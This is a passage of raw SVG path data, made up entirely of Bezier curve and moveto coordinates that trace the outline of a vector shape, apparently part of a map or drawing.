966.27515,548.63619 963.88156,547.91878 961.2623,547.53746 C 958.64303,547.15614 955.49682,546.19995 954.2707,545.41259 C 953.04459,544.62523 951.01959,544.00195 949.7707,544.02752 C 944.64955,544.13239 937.33117,544.86173 934.76353,545.52311 C 933.0446,545.96588 930.52711,545.62782 927.99329,544.61399 C 922.82262,542.5451 922,542.5834 922,544.89301 C 922,547.62717 919.71849,548.2355 908.5,548.4926 C 900.90932,548.66656 898.09287,548.36968 896.8102,547.26038 C 895.38245,546.02561 894.02991,545.98292 888.08826,546.98511 C 884.22058,547.63748 879.72827,547.87959 878.10534,547.52314 C 875.59532,546.97184 875.22288,547.14577 875.61194,548.68752 C 876.13387,550.75584 872.22891,552.99059 868.05064,553.01474 C 866.64779,553.02285 864.375,553.67853 863,554.4718 C 858.16436,557.26162 855.46656,558.17243 852,558.18554 C 850.075,558.19283 847.8186,558.56311 846.98579,559.00839 C 846.07691,559.49433 844.72367,559.27111 843.60076,558.45002 C 842.57181,557.69764 839.7056,556.77848 837.2314,556.40745 C 834.7572,556.03642 831.99872,555.00546 831.10144,554.11643 C 829.82146,552.84819 826.88836,552.43442 817.48502,552.19557 C 799.0016,551.72609 787.15129,550.25662 783.46227,547.97668 C 781.04609,546.4834 778.58094,546.01719 773.38197,546.07029 C 769.59688,546.10894 765.6,546.52731 764.5,547 C 763.4,547.47269 763.0625,547.89106 763.75,547.92971 C 766.30688,548.07348 764.93815,550.71548 762.25,550.8251 C 755.74247,551.09047 748.31743,551.76032 746,552.29109 C 744.625,552.60602 739.57747,553.63654 734.78326,554.58115 C 729.98906,555.52576 726.29127,556.66227 726.56596,557.10672 C 727.27198,558.24909 721.48876,561.06514 720.39876,560.10975 C 719.90444,559.67648 716.8,558.72402 713.5,557.99316 C 710.2,557.2623 706.99721,556.2843 706.38268,555.81983 C 705.14556,554.88479 702.59461,557.26128 703.67534,558.34201 C 704.03724,558.7039 702.93489,559 701.22568,559 C 699.51648,559 697.82364,558.52365 697.46382,557.94145 C 696.7631,556.80766 691.28685,557.59985 689.40799,559.1068 C 688.80739,559.58851 688.0796,559.74626 687.79068,559.45735 C 687.50177,559.16844 685.06818,559.43233 682.38269,560.04377 C 675.93852,561.51101 669.00166,561.5 654.70229,559.99981 C 648.21355,559.31906 642.62996,559.03671 642.2943,559.37237 C 641.95865,559.70802 641.08505,559.48555 640.35297,558.87798 C 638.9489,557.7127 632,558.51029 632,559.83673 C 632,560.24708 627.05416,560.48794 621.00924,560.37196 C 614.96432,560.25598 609.78722,560.53526 609.50459,560.99258 C 609.22195,561.44989 607.75529,561.67188 606.24535,561.48587 C 604.73541,561.29987 600.14774,560.87797 596.05054,560.54832 C 591.2409,560.16135 587.9574,559.36644 586.78464,558.3051 C 585.16706,556.84121 584.83308,556.8273 583.7341,558.17807 C 581.93736,560.38643 572.45587,562.11495 561.53216,562.22557 C 556.28947,562.27866 552,562.69962 552,563.16105 C 552,563.62247 550.85265,564 549.45034,564 C 548.04803,564 545.46053,564.76427 543.70034,565.69838 C 541.94015,566.63248 539.74561,567.2848 538.82357,567.14798 C 537.90154,567.01116 534.59469,567.56575 531.47503,568.38041 C 528.35537,569.19506 525.16418,569.6165 524.3835,569.31692 C 522.80015,568.70933 517,570.81704 517,572 C 517,573.10567 512.13543,574.7673 507.2774,575.32103 C 504.95498,575.58575 502.33533,576.52181 501.45597,577.40117 C 500.57662,578.28053 498.97345,579 497.89339,579 C 496.81332,579 494.93297,579.64245 493.71482,580.42767 C 492.49667,581.21289 488.58134,582.37694 485.01409,583.01445 C 481.44684,583.65196 478.0948,584.44141 477.56511,584.76878 C 477.03541,585.09615 474.48936,585.47083 471.9072,585.60141 C 469.32505,585.73198 465.86506,586.53554 464.21835,587.38709 C 461.72973,588.674 459.51629,588.78699 451.10574,588.05644 C 445.54051,587.57304 439.97754,587.31686 438.74357,587.48717 C 428.17438,588.94587 424.51575,588.73139 406.5,585.59691 z M 1100.25,549.33772 C 1099.5625,549.06031 1098.4375,549.06031 1097.75,549.33772 C 1097.0625,549.61513 1097.625,549.84211 1099,549.84211 C 1100.375,549.84211 1100.9375,549.61513 1100.25,549.33772 z M 371,575.07143 C 371,573.90379 373.854,571 375.00162,571 C 375.95834,571 374.83997,566.43802 373.0746,563.13939 C 371.58737,560.36048 373.14796,557.2998 376.8108,555.81181 L 379.5,554.71935 L 377.00525,554.06583 C 375.63314,553.70639 374.34358,552.53204 374.13957,551.45615 C 373.93556,550.38027 373.25819,549.15336 372.63432,548.72968 C 371.86565,548.20768 372.30587,547.28488 374,545.86695 C 375.375,544.71613 376.5,543.45563 376.5,543.06584 C 376.5,542.67606 377.2875,541.56964 378.25,540.60714 C 379.2125,539.64464 380,539.35341 380,539.95996 C 380,540.5665 379.32758,541.3208 378.50574,541.63617 C 377.6839,541.95154 377.24824,542.59265 377.53761,543.06085 C 377.82698,543.52906 376.90129,544.6738 375.48052,545.60472 C 373.67427,546.78822 373.21352,547.61352 373.94865,548.34865 C 374.52689,548.92689 375,550.21 375,551.2 C 375,552.47303 375.76322,553 377.60699,553 C 379.57338,553 380.06483,553.38868 379.60699,554.58179 C 379.27314,555.45177 379,556.35177 379,556.58179 C 379,556.8118 378.11583,557 377.03518,557 C 374.25653,557 372.61296,560.40829 374.0746,563.13939 C 374.70433,564.31605 375.58899,566.5669 376.04052,568.14127 C 376.71216,570.48314 376.4962,571.19926 374.85318,572.07858 C 373.71435,572.68806 373.08134,573.76959 373.39106,574.57669 C 373.71067,575.4096 373.32804,576 372.46862,576 C 371.66088,576 371,575.58214 371,575.07143 z M 302,570.93618 C 297.325,570.5214 289.49279,570.4359 284.59508,570.74619 C 277.98544,571.16493 275.87459,571.01193 276.40569,570.1526 C 276.93753,569.29207 273.70406,569.07417 263.81061,569.30383 C 256.48977,569.47377 249.38758,569.40336 248.02795,569.14738 C 245.7454,568.71763 245.70707,568.62287 247.52795,567.91126 C 248.66033,567.46872 245.01755,567.11064 238.97251,567.07029 C 231.14343,567.01802 227.89616,567.38443 226.30376,568.49979 C 225.12607,569.32468 223.45352,569.72753 222.58699,569.39501 C 220.40895,568.55921 221.73482,566.78106 224,567.5 C 225.00743,567.81975 226.12111,567.61305 226.47486,567.04068 C 227.45877,565.44868 248.48702,565.67697 249.82921,567.29422 C 250.63551,568.26574 254.28135,568.51235 264.45166,568.2833 C 271.90325,568.11548 278,568.36108 278,568.82908 C 278,569.79111 307.61766,569.51299 313,568.50042 C 315.01239,568.12183 319.25512,568.479 322.98217,569.34075 C 326.83539,570.23167 330.07991,570.49378 330.98217,569.98701 C 332.81894,568.95536 331.7478,568.48579 325.58631,567.62156 C 320.70312,566.93663 319.49016,565.82115 320.85516,563.27063 C 321.90027,561.31784 323.41388,561.1697 327.94645,562.57662 C 330.22192,563.28294 330.25687,563.38924 328.44645,564.09772 C 327.3759,564.51666 325.15,564.92269 323.5,565 C 320.89888,565.12188 320.76592,565.25484 322.5,566 C 323.6,566.47269 326.36436,566.89106 328.64301,566.92971 C 332.52849,566.99563 334,568.11778 334,571.01486 C 334,571.98492 328.46948,571.60107 322.36091,570.20702 C 318.79791,569.39391 316.27707,569.30667 312.69098,569.87238 C 312.24602,569.94257 312.16008,570.45 312.5,571 C 312.83992,571.55 312.52898,571.93033 311.80902,571.84517 C 311.08906,571.76001 306.675,571.35097 302,570.93618 z M 321.75,560.18358 C 316.99218,559.63613 318.76483,558 324.11579,558 C 326.92947,558 331.40847,557.22683 334.06913,556.28185 C 338.84014,554.58734 338.93916,554.59422 341.26779,556.78185 C 343.87591,559.23205 345.13199,559.61321 344.75,557.83853 C 344.6125,557.19971 345.625,556.39193 347,556.04344 C 350.39462,555.18309 350.27261,552.5 346.83886,552.5 C 343.36886,552.5 342.39379,551.43537 344.04337,549.44774 C 344.98404,548.31431 346.29858,548.02103 348.54738,548.44291 C 351.63821,549.02275 354.04218,547.67947 353.66496,545.58333 C 353.57423,545.07917 354.0625,544.47917 354.75,544.25 C 355.4375,544.02083 356,544.33239 356,544.94235 C 356,545.66082 357.03648,545.51538 358.94325,544.52935 C 360.59712,543.6741 362.13443,543.4085 362.45246,543.92308 C 362.76374,544.42673 361.43927,545.35998 359.50921,545.99696 C 357.57914,546.63394 356,547.55608 356,548.04617 C 356,548.53625 355.325,548.67821 354.5,548.36163 C 353.47647,547.96886 352.96029,548.4553 352.875,549.89301 C 352.80625,551.05186 352.6375,552.45 352.5,553 C 352.3625,553.55 352.19375,554.40598 352.125,554.90217 C 352.05625,555.39837 350.61625,556.28673 348.92499,556.8763 C 347.23374,557.46588 346.1353,558.4099 346.48401,558.97413 C 347.62812,560.82534 343.42687,560.04634 341.23037,558 C 338.74826,555.68756 336.6998,555.45186 335.16431,557.30202 C 334.56999,558.01813 332.164,558.71732 329.81767,558.85576 C 327.47134,558.9942 325.315,559.42079 325.0258,559.80374 C 324.73661,560.18668 323.2625,560.35761 321.75,560.18358 z M 346.36163,550.5 C 346.67821,549.675 346.5495,549 346.0756,549 C 345.60171,549 344.95496,549.675 344.63837,550.5 C 344.32179,551.325 344.4505,552 344.9244,552 C 345.39829,552 346.04504,551.325 346.36163,550.5 z M 351.1875,550.31689 C 350.46562,550.02802 349.60312,550.06354 349.27083,550.39583 C 348.93854,550.72812 349.52917,550.96447 350.58333,550.92105 C 351.74828,550.87307 351.98523,550.63611 351.1875,550.31689 z M 362.18233,542.61285 C 360.12634,541.49897 360.04023,541.2115 361.4196,540.06673 C 362.27481,539.35696 363.64085,539.03194 364.45524,539.34445 C 365.26963,539.65696 366.21542,539.46045 366.557,538.90777 C 366.95928,538.25687 367.68552,538.32404 368.61864,539.09846 C 369.72708,540.01839 370.68645,540.02326 372.77961,539.11961 L 375.5,537.94518 L 373.02796,539.89438 C 371.66834,540.96644 370.21855,541.63507 369.8062,541.38023 C 369.39386,541.12539 368.03128,541.58099 366.77825,542.39268 C 364.90516,543.60603 364.08783,543.64519 362.18233,542.61285 z M 381.29689,539.66871 C 381.74913,538.49017 381.22755,538.2434 378.90547,538.53727 C 372.66874,539.32658 377.29581,537.23232 384.51822,535.99688 C 390.23205,535.0195 392.38331,534.98331 393.24999,535.84999 C 394.11667,536.71667 393.6732,537.01732 391.45,537.07029 C 387.69321,537.15979 385.01421,538.21602 385.2873,539.5 C 385.40429,540.05 384.42416,540.6521 383.10924,540.838 C 381.31599,541.09152 380.86304,540.79929 381.29689,539.66871 z M 371,534 C 371,532.69797 375.6953,532.69797 376.5,534 C 376.86058,534.58342 375.84372,535 374.05902,535 C 372.37656,535 371,534.55 371,534 z M 379.5,532 C 379.83992,531.45 381.32898,531.00689 382.80902,531.01531 C 384.91378,531.02729 385.17323,531.2418 384,532 C 382.02414,533.2769 378.71083,533.2769 379.5,532 z M 392,528.96862 C 392,528.43588 392.675,528 393.5,528 C 395.42067,528 395.42067,528.6246 393.5,529.36163 C 392.675,529.67821 392,529.50135 392,528.96862 z M 425,527 C 423.70731,526.1646 423.73371,526.02851 425.19098,526.01531 C 426.12102,526.00689 427.16008,526.45 427.5,527 C 428.28218,528.2656 426.95837,528.2656 425,527 z M 338,508.13436 C 335.525,507.33989 333.275,506.37893 333,505.9989 C 332.725,505.61888 331.29979,505.01444 329.83287,504.65572 C 327.5363,504.09411 327.20214,503.5448 327.4277,500.70202 C 327.71007,497.14326 323.62261,489.71045 322.7427,492.18262 C 321.92043,494.49286 321.16088,492.63458 320.82554,487.49221 C 320.53046,482.96711 320.68713,482.53229 322.5,482.84507 C 323.6,483.03486 324.1664,482.85126 323.75868,482.43708 C 323.35095,482.0229 323.57595,481.00208 324.25868,480.16859 C 325.31559,478.8783 325.16589,478.73927 323.251,479.23271 C 319.90562,480.09476 319.45751,478.19885 322.4075,475.66399 C 323.83338,474.43878 325,472.66315 325,471.71816 C 325,469.76859 326.95903,469.32682 327.07608,471.25 C 327.21027,473.45482 329.84795,465.59577 329.84497,463 C 329.8434,461.625 329.62356,461.03722 329.35644,461.69382 C 329.08933,462.35043 328.11236,462.62739 327.18539,462.30929 C 325.83943,461.84741 325.88321,462.02957 327.40278,463.21376 C 329.62583,464.94618 328.77486,467 325.83399,467 C 324.29538,467 323.95283,466.5653 324.4567,465.25223 C 324.82558,464.29096 325.58514,461.37001 326.14463,458.76123 C 326.70411,456.15245 327.52826,453.79155 327.97607,453.51479 C 328.42389,453.23802 328.3213,451.16393 327.74809,448.90569 C 327.00174,445.96529 327.01879,444.60642 327.80817,444.11856 C 328.41442,443.74388 330.13627,440.75975 331.63451,437.48716 C 333.7639,432.83596 334.40949,429.78652 334.59179,423.5185 C 334.72006,419.10833 335.31744,414.22517 335.91929,412.66704 C 336.52115,411.10891 337.22444,407.95891 337.48214,405.66704 C 337.73985,403.37517 338.24765,399.025 338.61059,396 C 338.97352,392.975 339.3199,388.1636 339.38032,385.30801 C 339.48043,380.57633 339.1803,379.83882 335.99508,376.9894 C 334.07279,375.26975 330.30022,372.75594 327.6116,371.40314 C 321.94729,368.5531 318.04905,365.14469 318.00083,363 C 317.98228,362.175 316.88872,359.7 315.5707,357.5 C 314.25268,355.3 311.48838,350.20089 309.4278,346.16864 C 307.36723,342.1364 304.61139,338.13625 303.30372,337.27944 C 301.99605,336.42262 301.10695,335.22173 301.32794,334.61079 C 301.54893,333.99986 301.32311,332.70949 300.82611,331.74331 C 300.15125,330.43137 300.55682,329.35227 302.42804,327.48105 C 304.79725,325.11184 304.83418,324.91339 303.10667,323.83454 C 301.66443,322.93385 301.43773,322.0415 302.03009,319.5968 C 303.19447,314.79131 305.99142,310 307.63226,310 C 308.44944,310 308.83948,309.54929 308.49903,308.99842 C 308.15857,308.44756 309.2413,306.7535 310.90509,305.23387 C 313.61413,302.75954 313.92309,301.87817 313.8624,296.7975 C 313.81174,292.5562 313.31572,290.69071 311.89732,289.40707 C 310.85379,288.4627 310,286.88633 310,285.90403 C 310,284.92173 309.54655,283.83779 308.99233,283.49526 C 307.56339,282.61213 304.89562,285.56441 305.55943,287.29428 C 305.90386,288.19185 305.33588,288.94041 304.05656,289.27496 C 302.92545,289.57075 302,289.37457 302,288.83899 C 302,288.30342 301.10283,288.14997 300.00629,288.498 C 298.47581,288.98376 298.15215,288.76708 298.61328,287.56539 C 299.03653,286.46243 298.61571,286 297.18878,286 C 294.17631,286 292,284.95143 292,283.5 C 292,282.1384 289.25914,280.56836 287.3834,280.85548 C 285.90234,281.0822 283.70951,278.37147 284.19523,276.91432 C 285.04926,274.35221 279.11114,269.95294 271.40195,267.43641 C 266.27494,265.76279 262.29652,263.69373 259.70693,261.3542 C 256.50343,258.46002 255.29692,257.93788 253.14112,258.5127 C 248.10409,259.85576 243.21486,259.04742 235.72188,255.63276 C 231.57997,253.74523 226.76773,251.88826 225.028,251.50615 C 223.28827,251.12404 221.62212,250.17884 221.32544,249.4057 C 221.02876,248.63257 220.25918,248 219.61525,248 C 217.32825,248 215.24926,244.27125 215.35198,240.35366 C 215.44071,236.96983 214.84748,235.84858 210.97731,232.08516 C 208.51479,229.69056 205.4875,227.06504 204.25,226.25066 C 203.0125,225.43629 202,223.92173 202,222.88499 C 202,221.84825 201.60179,221 201.11508,221 C 200.62838,221 198.39792,219.11226 196.15852,216.80503 C 192.69748,213.23917 191.98639,212.87188 191.41692,214.35591 C 190.99333,215.45976 191.50613,216.91044 192.81142,218.30088 C 193.94686,219.5104 195.73079,222.41051 196.77569,224.74557 C 197.8206,227.08063 198.91258,228.75409 199.2023,228.46436 C 199.49203,228.17463 200.44837,229.03536 201.32751,230.37708 C 202.68679,232.45162 202.71749,232.98957 201.5327,233.97286 C 200.437,234.88221 199.9047,234.69045 199.04009,233.07492 C 198.43543,231.9451 196.60405,230.32949 194.97036,229.48467 C 192.95394,228.44194 192,227.19333 192,225.59676 C 192,222.8446 190.54508,221.42589 186.74441,220.47199 C 185.23498,220.09314 184,219.36613 184,218.85641 C 184,218.3135 184.77393,218.34383 185.86852,218.92963 C 186.8962,219.47963 187.95708,219.70959 188.22602,219.44065 C 188.49496,219.17171 189.28422,219.63754 189.97994,220.47583 C 190.67566,221.31413 191.63979,222 192.12244,222 C 193.60915,222 193.09116,218.97221 191.5,218.36163 C 190.675,218.04504 190,217.14504 190,216.36163 C 190,215.57821 189.325,214.67821 188.5,214.36163 C 187.675,214.04504 187,213.3438 187,212.8033 C 187,212.26281 186.12529,211.07345 185.05619,210.16029 C 183.9871,209.24713 182.90404,207.05451 182.64939,205.28781 C 181.72321,198.86211 188.64569,200.46785 190.30087,207.06264 C 191.0253,209.94899 196.1291,216 197.8392,216 C 198.47764,216 199,216.64468 199,217.43261 C 199,218.22055 199.9,219.15087 201,219.5 C 202.74268,220.05311 203.538,221.33063 202.75,222.31105 C 202.6125,222.48213 204.3,224.16963 206.5,226.06105 C 208.7,227.95247 210.65799,229.86147 210.85109,230.30327 C 211.04419,230.74506 212.36357,232.18344 213.78306,233.49966 C 215.55989,235.14723 216.43143,237.07777 216.58059,239.69639 C 216.86061,244.61272 217.86009,247 219.63837,247 C 220.42179,247 221.31124,247.6475 221.61492,248.43889 C 221.91861,249.23028 223.52249,250.17549 225.17911,250.53934 C 226.83573,250.90319 231.57997,252.74523 235.72188,254.63276 C 243.18996,258.03607 248.11601,258.85723 253.07458,257.52542 C 255.0366,256.99844 256.38674,257.45454 258.74913,259.44236 C 261.75867,261.97472 261.86785,261.99173 262.49194,260.02541 C 262.9227,258.66818 264.01977,257.98902 265.81739,257.96673 L 268.5,257.93346 L 266.40602,256.18277 C 264.7015,254.7577 264.55416,254.20591 265.61381,253.21604 C 266.32979,252.54722 268.07541,252 269.49298,252 C 273.1793,252 276.83584,249.27448 278.74496,245.10374 C 279.65223,243.12168 280.55554,241.20069 280.75231,240.83486 C 281.5004,239.44411 276.93222,238.94116 273.04917,239.98676 C 270.51731,240.66852 269,241.66059 269,242.63425 C 269,243.49069 268.2141,245.52183 267.25356,247.1479 C 265.99894,249.27181 264.95757,249.96066 263.5556,249.59404 C 262.48226,249.31335 261.01816,249.56997 260.30204,250.1643 C 259.58592,250.75862 259,250.97593 259,250.6472 C 259,250.31846 257.875,250.47723 256.5,251 C 254.91366,251.60313 254,251.60104 254,250.9943 C 254,250.46839 252.9875,249.78312 251.75,249.47148 C 249.31661,248.85866 245.13276,243.32255 243.45845,238.5 C 242.88559,236.85 242.43993,232.89393 242.46809,229.70873 C 242.51323,224.6014 242.26626,223.85395 240.37687,223.37974 C 239.19855,223.084 236.74415,220.51507 234.92265,217.67102 C 233.10115,214.82696 231.1359,212.16939 230.55542,211.76531 C 228.67051,210.45321 225.12273,210.95827 224.16172,212.67551 C 223.35095,214.12427 222.57305,213.71827 218.41362,209.67551 C 215.76788,207.10398 213.12997,204.94468 212.55159,204.87706 C 211.97322,204.80944 207.225,204.69694 202,204.62706 C 195.98203,204.54657 191.76694,204.01416 190.5,203.17449 C 188.5,201.84899 188.5,201.84899 190.5,202.6228 C 191.6,203.04839 197,203.42224 202.5,203.45358 C 213.19996,203.51454 214.96211,204.13953 219.03581,209.3184 C 221.37133,212.28753 223.17772,212.69572 224.88391,210.63989 C 226.75328,208.38743 231.02283,209.92438 233.21431,213.63866 C 234.3051,215.4874 235.55432,217 235.99037,217 C 236.42642,217 237.05305,218.07523 237.38289,219.38941 C 237.75589,220.87558 238.97553,222.02803 240.60929,222.43807 C 243.90359,223.26489 244.45988,222.72781 243.04584,220.08565 C 242.20215,218.5092 242.22306,218 243.13148,218 C 243.7925,218 244.07083,217.7375 243.75,217.41667 C 242.78298,216.44965 246.85603,213 248.96482,213 C 250.04547,213 251.37735,212.16343 251.92457,211.14095 C 252.73938,209.61846 253.99512,209.30989 258.86092,209.43649 C 262.12871,209.52151 265.48176,210.15494 266.31215,210.8441 C 267.35026,211.70565 268.02756,211.76443 268.48007,211.03225 C 268.84204,210.44657 269.6696,210.23309 270.3191,210.55785 C 270.96859,210.8826 270.62649,210.43994 269.55887,209.57416 C 268.49125,208.70837 267.81625,207.9625 268.05887,207.91667 C 276.78367,206.26847 287,206.91463 287,209.11464 C 287,209.66864 287.88342,209.59757 289.10173,208.94556 C 290.87258,207.99783 291.64006,208.23903 293.97673,210.47771 C 295.60076,212.03362 296.75,214.2009 296.75,215.70763 C 296.75,217.12276 297.49071,218.69511 298.39603,219.20175 C 299.30135,219.7084 299.81821,220.48512 299.54461,220.92781 C 298.92503,221.93032 302.79036,225.54298 303.60788,224.72546 C 304.81367,223.51967 304.14269,219.31971 301.62076,212.28724 C 298.84191,204.53833 298.9072,203.19027 302.1699,200.94857 C 303.32948,200.15185 305.51808,198.4875 307.03347,197.25 C 308.54885,196.0125 310.17375,194.99945 310.64436,194.99878 C 311.11496,194.99811 312.80749,193.87311 314.40554,192.49878 C 316.00359,191.12445 316.80521,190 316.18692,190 C 315.56864,190 315.32179,189.325 315.63837,188.5 C 315.95496,187.675 316.94096,187 317.8295,187 C 319.07019,187 318.93908,186.64563 317.26439,185.47263 C 316.06505,184.63258 315.3206,183.3281 315.61006,182.57378 C 315.89952,181.81947 315.64833,180.90069 315.05186,180.53205 C 314.45539,180.16342 314.25597,179.39485 314.60869,178.82414 C 315.02218,178.1551 315.5554,178.26846 316.10969,179.14324 C 316.73551,180.13091 316.97354,179.87916 316.98469,178.21778 C 317.00432,175.29235 320.96294,173.56706 322.58036,175.77901 C 323.53378,177.0829 323.7869,177.03172 324.50281,175.3903 C 324.95626,174.35063 325.36613,173.06329 325.41363,172.52953 C 325.53319,171.18617 330.02835,169.03257 332.75,169.01474 C 333.9875,169.00663 335,168.52344 335,167.94098 C 335,167.35852 335.50838,167.19616 336.12973,167.58018 C 336.82049,168.00709 337.06628,167.73861 336.76229,166.8892 C 336.1605,165.20771 338.99773,160 340.51561,160 C 341.11202,160 342.1625,159.4375 342.85,158.75 C 343.5375,158.0625 345.0525,157.5 346.21667,157.5 C 347.38083,157.5 348.52083,156.9375 348.75,156.25 C 348.97917,155.5625 348.7571,155 348.25653,155 C 347.75595,155 347.5403,153.67877 347.77731,152.06392 C 348.17858,149.32993 347.99059,149.13403 345.04596,149.21776 C 342.44615,149.29167 341.54815,149.96538 339.99723,153.00544 C 338.11385,156.69715 338.09761,156.70431 330.08197,157.37279 C 321.31119,158.10424 318.73341,158.75963 319.53375,160.05461 C 320.29585,161.28771 316.5979,163 313.17273,163 C 311.54542,163 309.97654,163.61875 309.68634,164.375 C 309.05851,166.01111 296.37076,170.0795 294.33382,169.29786 C 292.84794,168.72767 293.1077,166.37888 294.625,166.66501 C 295.10625,166.75576 295.61223,165.29326 295.7494,163.41501 C 296.00913,159.85859 295.2289,159.1711 293.21667,161.18333 C 292.56583,161.83417 291.71833,162.05167 291.33333,161.66667 C 290.94833,161.28167 291.16583,160.43417 291.81667,159.78333 C 292.4675,159.1325 293,157.79 293,156.8 C 293,154.56685 290.22996,154.4502 287.22251,156.5567 C 286.00013,157.41289 284.99311,157.75039 284.98469,157.3067 C 284.97627,156.86302 284.52149,157.175 283.97407,158 C 283.42666,158.825 283.22602,161.075 283.52821,163 C 283.97594,165.85212 283.67842,166.74658 281.92093,167.8321 C 280.62747,168.63101 279.40046,168.80046 278.85545,168.25545 C 277.6559,167.0559 277.45039,161.99536 278.50338,159.58596 C 279.09859,158.22401 279.00241,157.88047 278.16994,158.39497 C 277.52647,158.79266 277,158.62266 277,158.0172 C 277,155.94702 280.49723,153.28843 284,152.6958 L 287.5,152.10364 L 284.3488,153.68645 C 282.3481,154.69139 280.65756,156.6441 279.71842,159.03493 C 278.28444,162.68547 278.44789,168 279.99413,168 C 281.775,168 282.96846,165.0923 282.385,162.175 C 281.85361,159.51804 282.28156,158.55982 285.31544,155.61353 C 289.30246,151.7416 288.40293,150.45858 282.48028,151.56968 C 280.62025,151.91862 278.95238,151.73197 278.5825,151.13348 C 278.2269,150.55811 277.27536,150.34084 276.46797,150.65066 C 275.66059,150.96049 275,150.66073 275,149.98454 C 275,149.06531 274.6591,149.03803 273.64889,149.87643 C 272.38564,150.92484 271.38405,151.04178 264.25,150.9738 C 261.6148,150.94868 261.58103,150.88607 263.44113,149.4738 C 265.86376,147.63443 266.91431,147.61311 267.59597,149.38949 C 268.19555,150.95199 271.35064,150.47255 274.47251,148.34455 C 277.17733,146.50082 278.80483,146.6592 278.63889,148.75 C 278.52504,150.18451 279.22112,150.45595 282.5,150.25568 C 289.05747,149.85516 289.60534,149.2214 285.69066,146.56483 C 281.44762,143.68542 277.87827,143.00094 276.47322,144.79724 C 275.27963,146.3232 267.80043,148.22161 267.02526,147.19538 C 266.73637,146.81292 265.825,146.42569 265,146.33487 C 260.44876,145.83386 253.52082,144.06233 253.27957,143.33787 C 253.12612,142.87704 231.38267,142.62104 204.9608,142.76898 C 167.63164,142.97799 156.95626,143.31242 157.079,144.26898 C 157.50914,147.6211 156.87201,149 154.89301,149 C 153.50003,149 152.96768,148.5266 153.32209,147.60302 C 153.66558,146.70791 153.01449,146.04476 151.50973,145.75711 L 149.16129,145.30818 L 150.97264,148.68777 C 152.55643,151.64278 152.62729,152.59705 151.53666,156.28368 C 150.85063,158.60266 150.48673,161.0625 150.728,161.75 C 150.96927,162.4375 150.70258,163 150.13535,163 C 149.43249,163 149.44052,163.96524 150.16059,166.03082 C 150.74169,167.69778 150.98553,169.94733 150.70245,171.02983 C 150.41937,172.11233 150.59551,173.25001 151.09388,173.55802 C 151.59225,173.86603 152,174.84354 152,175.73028 C 152,178.00582 154.92428,180.96629 156.5542,180.34083 C 157.50493,179.976 157.79797,180.45275 157.51767,181.90827 C 157.29611,183.05872 157.539,184 158.05742,184 C 158.57584,184 159,184.89619 159,185.99153 C 159,187.08687 159.9,188.54511 161,189.23207 C 162.1,189.91903 163,191.04785 163,191.74055 C 163,192.43325 163.83086,193 164.84636,193 C 167.35261,193 172.28011,195.54705 174.48302,197.98124 C 175.929,199.57903 177.05878,199.85433 180.14474,199.36086 C 182.8698,198.92511 184,199.10637 184,199.97918 C 184,200.69355 183.3343,200.95852 182.42054,200.60788 C 181.55183,200.27453 179.76393,200.27213 178.44743,200.60255 C 176.13816,201.18214 176.10771,201.3076 177.58346,204.1614 C 178.42479,205.78834 180.58765,208.78009 182.38982,210.80974 C 186.93195,215.92519 187.46592,217.75 184.42065,217.75 C 183.08929,217.75 182,217.35625 182,216.875 C 182,216.39375 182.675,216 183.5,216 C 185.79901,216 185.29193,214.37381 182.25,211.99126 C 180.7375,210.80662 177.88255,206.83645 175.90568,203.16868 C 173.9288,199.50091 171.8138,196.5 171.20568,196.5 C 170.59755,196.5 169.5375,195.9375 168.85,195.25 C 168.1625,194.5625 166.34,194 164.8,194 C 163.12118,194 162,193.46143 162,192.65499 C 162,191.91523 161.1,190.49549 160,189.5 C 158.9,188.50451 158,187.19235 158,186.58408 C 158,185.97582 156.43363,183.68306 154.51918,181.48907 C 152.60474,179.29508 151.02974,176.7125 151.01918,175.75 C 151.00863,174.7875 150.56125,174 150.025,174 C 149.4842,174 149.30632,172.71841 149.62557,171.12217 C 149.94213,169.53936 149.72837,167.36097 149.15054,166.28129 C 148.38634,164.85337 148.49213,163.01517 149.53862,159.53795 C 151.55214,152.8475 149.55113,145.02777 145.33386,143.10625 C 144.10594,142.54678 141.23735,140.91238 138.95923,139.47426 C 135.22375,137.11616 134.96058,136.69462 136.2781,135.17975 C 137.78017,133.45269 137.52096,130.56 135.95106,131.53024 C 135.4681,131.82873 134.20096,131.20096 133.13519,130.13519 C 132.06943,129.06943 130.21188,127.88463 129.0073,127.50232 C 127.47473,127.0159 126.96662,126.23565 127.31496,124.9036 C 127.58875,123.85662 127.40489,123 126.90638,123 C 126.40787,123 126,121.8199 126,120.37756 C 126,118.12556 125.78168,117.9363 124.45449,119.03777 C 123.60446,119.74323 123.14034,120.92333 123.42311,121.66021 C 124.32783,124.01788 120.1141,123.14644 117.81305,120.5 C 116.6175,119.125 115.11559,118 114.47547,118 C 113.83534,118 111.55399,116.24702 109.4058,114.10449 C 107.25761,111.96196 103.8244,109.32507 101.77644,108.24472 C 99.728483,107.16437 98.310494,106.02284 98.625354,105.70798 C 98.940214,105.39312 98.182949,105.4009 96.942542,105.72528 C 95.698574,106.05058 94.938767,105.90809 95.248137,105.40752 C 95.556621,104.90839 93.939488,104.47879 91.654508,104.45286 C 89.369529,104.42694 83.680164,104.12342 79.011477,103.77837 C 74.342789,103.43333 70.067789,103.50819 69.511477,103.94472 C 68.955164,104.38125 66.475,104.99305 64,105.30427 C 61.525,105.61549 57.840416,106.1787 55.812036,106.55584 C 52.366209,107.19653 52.161936,107.09676 52.700774,105.03624 C 53.01796,103.82332 53.552543,103.20647 53.888738,103.66547 C 54.607583,104.64688 56.083293,104.61621 61.483335,103.50762 C 64.767959,102.83331 65.118776,102.55399 63.483335,101.91522 C 60.521613,100.75843 56,100.85038 56,102.06739 C 56,102.66599 55.154214,102.86633 54.074219,102.52356 C 52.890111,102.14773 51.82808,102.48479 51.316614,103.39873 C 50.859111,104.21624 49.363212,105.33244 47.992395,105.87917 C 45.855725,106.73135 45.785448,106.88545 47.5,106.95885 C 49.345307,107.03785 49.306634,107.19572 47,109 C 45.625,110.07554 44.076175,110.96553 43.558167,110.97776 C 43.040159,110.98999 39.586485,112.8 35.883337,115 C 32.180189,117.2 28.554013,119.00277 27.82517,119.00616 C 27.096326,119.00955 25.298134,119.63938 23.829186,120.40578 C 21.532908,121.60382 20.868648,121.5963 19.09235,120.35213 C 17.356332,119.13618 17.112424,119.1294 17.565344,120.30969 C 17.960327,121.339 16.687534,121.9955 12.802181,122.76652 C 9.8859812,123.34521 7.342439,123.66443 7.1498645,123.47588 C 6.3910838,122.73296 8.2098333,121 9.7483095,121 C 13.363638,121 31.824149,112.70916 32.730239,110.67853 C 33.361588,109.26363 33.877497,108.99277 